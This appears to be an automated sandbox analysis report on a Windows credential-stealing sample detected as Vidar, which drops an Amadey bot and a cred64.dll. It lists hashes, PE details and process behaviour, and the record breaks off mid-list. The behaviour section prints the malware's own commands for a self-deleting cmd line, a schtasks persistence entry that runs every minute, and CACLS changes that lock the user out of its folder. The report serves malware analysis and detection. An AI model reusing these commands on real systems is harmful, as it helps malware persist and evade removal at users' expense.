                                            C:\ProgramData\75873290272674793137.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7732440
                                            Entropy (8bit):7.8779499305543865
                                            Encrypted:false
                                            SSDEEP:196608:U+rNR2F7EU+iE09OKsRk3PdM+i+8lHFL9AYS:/RWEU+1OP6+X+oYS
                                            MD5:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            SHA1:F09EB7D69BC7440D3D45E14267236A78AC789FCB
                                            SHA-256:682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
                                            SHA-512:F77C16626A0E17FF79B95F9FDED6A365F913896C89BAF76D16BCC8706F3AD10A9476C7CBD3F235250B936171C6E958E145C402952506DC0E434A4F911C99FE02
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 35%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L....6.c.....................r.......FU...........@................................~.v...@...................................p......`..`c............u......P......0E..p........................... A..@.............A.h...........................lB@dO\ih............................ ..`Fh?jG[OJL...........................@..@qNR5:WbSLD..........................@...z?fd8ijJh.=......................... ..`CV?7x>JO......A.....................@...EVjKc_MI.wo...A..xo................. ..`dT<:EHzj.....P........o.............@..@@]topACL`c...`...\....o.............@..@........................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7705824
                                            Entropy (8bit):7.9708080300718365
                                            Encrypted:false
                                            SSDEEP:196608:ZQoqS56OZEssxxpKIIue41Cf7sgZz6kmAZQ/9RWB0:dMOevKiB1CfQgplmz/9a0
                                            MD5:2B62E02B3581980EE5A1DDA42FA4F3FE
                                            SHA1:5C36BFA4A4973E8F694D5C077E7312B1C991AEDF
                                            SHA-256:8C46C2AF1CB25BFA8FBBF9D683D72D30DDB2E5D0ECC6BBA997B24714CF2B8C91
                                            SHA-512:255E1B1D51D52872C5E0C54F7807ADC3581D36B3DFB8220C818AC38AC7FCEA91DD42999EE6CCAEF3B9836CD59FCFE19C2669A5B697D627DE4C1D9B8BA563EB3D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 12%
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................X....................@.................................*.u.............................,..O...X>..@....................~u...............................................................F.............................f5g\gWe7............................ ..`zDthL)*@............................@...nb"h!m#Y................................$^+<%+dU&...........................@...Z-),j99tO...........................@..P8"ikKHD[b.C......................... ..`k&l<0?<6......F.....................@...n[uZh3ex.lu...F..nu................. ..`Uh%r6i!H.............xu.............@..P.............................................................@......................@..P................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nppshell[1].exe

                                            Download File
                                            Process:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7732440
                                            Entropy (8bit):7.8779499305543865
                                            Encrypted:false
                                            SSDEEP:196608:U+rNR2F7EU+iE09OKsRk3PdM+i+8lHFL9AYS:/RWEU+1OP6+X+oYS
                                            MD5:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            SHA1:F09EB7D69BC7440D3D45E14267236A78AC789FCB
                                            SHA-256:682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
                                            SHA-512:F77C16626A0E17FF79B95F9FDED6A365F913896C89BAF76D16BCC8706F3AD10A9476C7CBD3F235250B936171C6E958E145C402952506DC0E434A4F911C99FE02
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 35%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L....6.c.....................r.......FU...........@................................~.v...@...................................p......`..`c............u......P......0E..p........................... A..@.............A.h...........................lB@dO\ih............................ ..`Fh?jG[OJL...........................@..@qNR5:WbSLD..........................@...z?fd8ijJh.=......................... ..`CV?7x>JO......A.....................@...EVjKc_MI.wo...A..xo................. ..`dT<:EHzj.....P........o.............@..@@]topACL`c...`...\....o.............@..@........................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe

                                            Download File
                                            Process:C:\ProgramData\75873290272674793137.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7732440
                                            Entropy (8bit):7.8779499305543865
                                            Encrypted:false
                                            SSDEEP:196608:U+rNR2F7EU+iE09OKsRk3PdM+i+8lHFL9AYS:/RWEU+1OP6+X+oYS
                                            MD5:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            SHA1:F09EB7D69BC7440D3D45E14267236A78AC789FCB
                                            SHA-256:682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
                                            SHA-512:F77C16626A0E17FF79B95F9FDED6A365F913896C89BAF76D16BCC8706F3AD10A9476C7CBD3F235250B936171C6E958E145C402952506DC0E434A4F911C99FE02
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 35%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L....6.c.....................r.......FU...........@................................~.v...@...................................p......`..`c............u......P......0E..p........................... A..@.............A.h...........................lB@dO\ih............................ ..`Fh?jG[OJL...........................@..@qNR5:WbSLD..........................@...z?fd8ijJh.=......................... ..`CV?7x>JO......A.....................@...EVjKc_MI.wo...A..xo................. ..`dT<:EHzj.....P........o.............@..@@]topACL`c...`...\....o.............@..@........................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\853321935212

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                            Category:dropped
                                            Size (bytes):96208
                                            Entropy (8bit):7.920718791075791
                                            Encrypted:false
                                            SSDEEP:1536:C66YpZSvaEuegY9ArFi7deYA070yjPTv6SUv9bMzXQoHID3WlgDnqc1uhDO6KgrO:YYnSvbtgsArFi3Y+yVFWAoHQWlep1u1S
                                            MD5:864C73BCC733D275D7A8B0AC455F09CF
                                            SHA1:D885D54A9AEED3B4D4F097218747629E59A83582
                                            SHA-256:D376E89252A2E21635744857EA02E60105545A58D6E75CEFF0F7D3FC4B07A2BF
                                            SHA-512:A6BF03A348371A7E38B24F51777195EDC995B3FC09A44D874942A85C123B9BEA041176C80BC5CF72088AB9C5D1D854607C82A2C9F12E78083703B5CC47E5657A
                                            Malicious:false
                                            Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(....Q..R...`2.`....j.$.....+..];$....F...K.1...3.)k...@<1..@.../...G. .....g.G.....~.W.W.......

                                            C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):7705824
                                            Entropy (8bit):7.9708080300718365
                                            Encrypted:false
                                            SSDEEP:196608:ZQoqS56OZEssxxpKIIue41Cf7sgZz6kmAZQ/9RWB0:dMOevKiB1CfQgplmz/9a0
                                            MD5:2B62E02B3581980EE5A1DDA42FA4F3FE
                                            SHA1:5C36BFA4A4973E8F694D5C077E7312B1C991AEDF
                                            SHA-256:8C46C2AF1CB25BFA8FBBF9D683D72D30DDB2E5D0ECC6BBA997B24714CF2B8C91
                                            SHA-512:255E1B1D51D52872C5E0C54F7807ADC3581D36B3DFB8220C818AC38AC7FCEA91DD42999EE6CCAEF3B9836CD59FCFE19C2669A5B697D627DE4C1D9B8BA563EB3D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 12%
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....^B*.....................X....................@.................................*.u.............................,..O...X>..@....................~u...............................................................F.............................f5g\gWe7............................ ..`zDthL)*@............................@...nb"h!m#Y................................$^+<%+dU&...........................@...Z-),j99tO...........................@..P8"ikKHD[b.C......................... ..`k&l<0?<6......F.....................@...n[uZh3ex.lu...F..nu................. ..`Uh%r6i!H.............xu.............@..P.............................................................@......................@..P................................................................................................................................................................................

                                            \Device\ConDrv

                                            Download File
                                            Process:C:\Windows\SysWOW64\cacls.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):15
                                            Entropy (8bit):3.240223928941852
                                            Encrypted:false
                                            SSDEEP:3:o3F:o1
                                            MD5:509B054634B6DE74F111C3E646BC80FD
                                            SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                            SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                            SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                            Malicious:false
                                            Preview:processed dir:

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.937705906500799
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:5GPueTFF2S.exe
                                            File size:1493440
                                            MD5:7d124bc23be85d73b1177143f41b5e72
                                            SHA1:09633b90a0b993fd4dec6d522a1243433fc3ab10
                                            SHA256:04805512d670fb5f37bdf17bf00aae6976650f82c0b4bd342f3506d204f7aea2
                                            SHA512:f4d318361bcccd7a3a77cdb243fa27e46abb6831cc315a4d8c4df9c37f30d11d2a0cd8a0ab9c8567f2c584dbcca1a9c336677216b8e31495c20061b287c29ebe
                                            SSDEEP:24576:jEiV++MCUfiiF5CYElcxGvvJq89F85NURwfCULmNQpBAXFVw/5xbpY0Y8vNcup:jEiV++MCxiF0tJ25NK2mapBA1uxYSlcG
                                            TLSH:BA65236E93951032DAC617342CF7CF9BB739EF2516A897472A869D2A7C31BD0D930306
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#c..g...g...g...yPb.~...yPs.v...yPe.+...@...`...g...9...yPl.e...yPr.f...g.q.b...yPw.f...Richg...........PE..L....#.c...........

                                            File Icon

                                            Icon Hash:c8d4f2e8e8b2e4d8

                                            Static PE Info

                                            General

                                            Entrypoint:0x40901d
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x63922306 [Thu Dec 8 17:46:46 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:bb2af1988009d4b4491115f62e2f94ab

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:CN=Amazon, OU=Server CA 1B, O=Amazon, C=US
                                            Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                            Error Number:-2146762486
                                            Not Before, Not After
                                            • 10/25/2022 2:00:00 AM 11/23/2023 12:59:59 AM
                                            Subject Chain
                                            • CN=vcoins.com
                                            Version:3
                                            Thumbprint MD5:7353B8C793C943D5CF2DE1715C892554
                                            Thumbprint SHA-1:D2516DC5680485D69BC68CCCCA5E2D61A43D345F
                                            Thumbprint SHA-256:C831B8A2466C3A56F5AA15E9C540B5A2B3359C94386EE03D349C975F08DE1C03
                                            Serial:050A012C9D98C6D640D2D7F67E016985

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F70A8E0920Fh
                                            jmp 00007F70A8E07A6Eh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            xor ecx, ecx
                                            cmp eax, dword ptr [00540008h+ecx*8]
                                            je 00007F70A8E07C05h
                                            inc ecx
                                            cmp ecx, 2Dh
                                            jc 00007F70A8E07BE3h
                                            lea ecx, dword ptr [eax-13h]
                                            cmp ecx, 11h
                                            jnbe 00007F70A8E07C00h
                                            push 0000000Dh
                                            pop eax
                                            pop ebp
                                            ret
                                            mov eax, dword ptr [0054000Ch+ecx*8]
                                            pop ebp
                                            ret
                                            add eax, FFFFFF44h
                                            push 0000000Eh
                                            pop ecx
                                            cmp ecx, eax
                                            sbb eax, eax
                                            and eax, ecx
                                            add eax, 08h
                                            pop ebp
                                            ret
                                            call 00007F70A8E08C5Ch
                                            test eax, eax
                                            jne 00007F70A8E07BF8h
                                            mov eax, 00540170h
                                            ret
                                            add eax, 08h
                                            ret
                                            push 0000000Ch
                                            push 0053F408h
                                            call 00007F70A8E08FC1h
                                            mov ecx, dword ptr [ebp+08h]
                                            xor edi, edi
                                            cmp ecx, edi
                                            jbe 00007F70A8E07C20h
                                            push FFFFFFE0h
                                            pop eax
                                            xor edx, edx
                                            div ecx
                                            cmp eax, dword ptr [ebp+0Ch]
                                            sbb eax, eax
                                            inc eax
                                            jne 00007F70A8E07C11h
                                            call 00007F70A8E07BB9h
                                            mov dword ptr [eax], 0000000Ch
                                            push edi
                                            push edi
                                            push edi
                                            push edi
                                            push edi
                                            call 00007F70A8E09349h
                                            add esp, 14h
                                            xor eax, eax
                                            jmp 00007F70A8E07CCAh
                                            imul ecx, dword ptr [ebp+0Ch]
                                            mov esi, ecx
                                            mov dword ptr [ebp+08h], esi
                                            cmp esi, edi
                                            jne 00007F70A8E07BF5h
                                            xor esi, esi
                                            inc esi
                                            xor ebx, ebx
                                            mov dword ptr [ebp-1Ch], ebx
                                            cmp esi, FFFFFFE0h
                                            jnbe 00007F70A8E07C5Bh
                                            cmp dword ptr [00755448h], 03h
                                            jne 00007F70A8E07C3Dh
                                            add esi, 0Fh

                                            Rich Headers

                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13f6740x50.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3560000x28330.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x16b6000x13c0.data
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x37f0000x14d4.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x13e1700x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x13f3380x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x13e0000x134.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x13c3310x13c400False0.9838724370059289data7.993775932964981IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x13e0000x1d660x1e00False0.36627604166666666data5.590565779983959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x1400000x21557c0xe00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x3560000x283300x28400False0.8145805027173914data7.416644005362062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x37f0000x3cc80x3e00False0.28616431451612906data3.1400595377335185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x3565080x1b278PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedPolishPoland
                                            RT_ICON0x3717800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384PolishPoland
                                            RT_ICON0x3759a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216PolishPoland
                                            RT_ICON0x377f500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304PolishPoland
                                            RT_ICON0x378df80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152PolishPoland
                                            RT_ICON0x3794600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096PolishPoland
                                            RT_ICON0x37a5080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024PolishPoland
                                            RT_ICON0x37adb00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512PolishPoland
                                            RT_ICON0x37b0980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304PolishPoland
                                            RT_ICON0x37ba200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576PolishPoland
                                            RT_ICON0x37c0e80x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288PolishPoland
                                            RT_ICON0x37c2d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024PolishPoland
                                            RT_ICON0x37c7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256PolishPoland
                                            RT_ICON0x37cca00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128PolishPoland
                                            RT_DIALOG0x37cdc80x108dataPolishPoland
                                            RT_DIALOG0x37ced00x15cdataPolishPoland
                                            RT_DIALOG0x37d02c0x13cdataPolishPoland
                                            RT_DIALOG0x37d1680x19cdataPolishPoland
                                            RT_STRING0x37d3040x14cdataPolishPoland
                                            RT_STRING0x37d4500x5acdataPolishPoland
                                            RT_STRING0x37d9fc0x540dataPolishPoland
                                            RT_STRING0x37df3c0x1ccdataPolishPoland
                                            RT_GROUP_ICON0x37e1080xcaTarga image data - Map 32 x 45688 x 1 +1PolishPoland
                                            RT_MANIFEST0x37e1d40x15aASCII text, with CRLF line terminatorsEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetSystemDefaultLangID, lstrlenA, TlsGetValue, HeapAlloc, InterlockedIncrement, OutputDebugStringW, IsBadReadPtr, GetConsoleCP, Sleep, HeapCreate, GetACP, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, FoldStringW, GetCurrentProcessId, GetThreadUILanguage, LCMapStringW, LCMapStringA, GetStringTypeW, MultiByteToWideChar, GetStringTypeA, GetStartupInfoW, SetUnhandledExceptionFilter, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetOEMCP, IsValidCodePage, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte
                                            USER32.dllGetMessagePos, MessageBoxW, IsIconic, GetMessageExtraInfo, IsZoomed, GetWindowTextLengthA, GetForegroundWindow
                                            ole32.dllCoInitialize, CoUninitialize

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            PolishPoland
                                            EnglishUnited States

                                            Network Behavior

                                            No network behavior found

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:10:39:00
                                            Start date:09/12/2022
                                            Path:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\5GPueTFF2S.exe
                                            Imagebase:0xec0000
                                            File size:1493440 bytes
                                            MD5 hash:7D124BC23BE85D73B1177143F41B5E72
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Target ID:1
                                            Start time:10:39:50
                                            Start date:09/12/2022
                                            Path:C:\ProgramData\75873290272674793137.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\ProgramData\75873290272674793137.exe"
                                            Imagebase:0xf70000
                                            File size:7732440 bytes
                                            MD5 hash:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.445175041.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 35%, ReversingLabs
                                            Reputation:low

                                            General

                                            Target ID:4
                                            Start time:10:39:56
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exit
                                            Imagebase:0xd90000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:5
                                            Start time:10:39:56
                                            Start date:09/12/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c72c0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:6
                                            Start time:10:39:56
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout /t 6
                                            Imagebase:0x1140000
                                            File size:26112 bytes
                                            MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:7
                                            Start time:10:40:04
                                            Start date:09/12/2022
                                            Path:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
                                            Imagebase:0xa0000
                                            File size:7732440 bytes
                                            MD5 hash:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000003.483002099.0000000001165000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 35%, ReversingLabs
                                            Reputation:low

                                            General

                                            Target ID:8
                                            Start time:10:40:17
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
                                            Imagebase:0x11e0000
                                            File size:185856 bytes
                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:9
                                            Start time:10:40:17
                                            Start date:09/12/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c72c0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:10
                                            Start time:10:40:17
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
                                            Imagebase:0xd90000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:11
                                            Start time:10:40:17
                                            Start date:09/12/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61e220000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:12
                                            Start time:10:40:18
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            Imagebase:0xd90000
                                            File size:232960 bytes
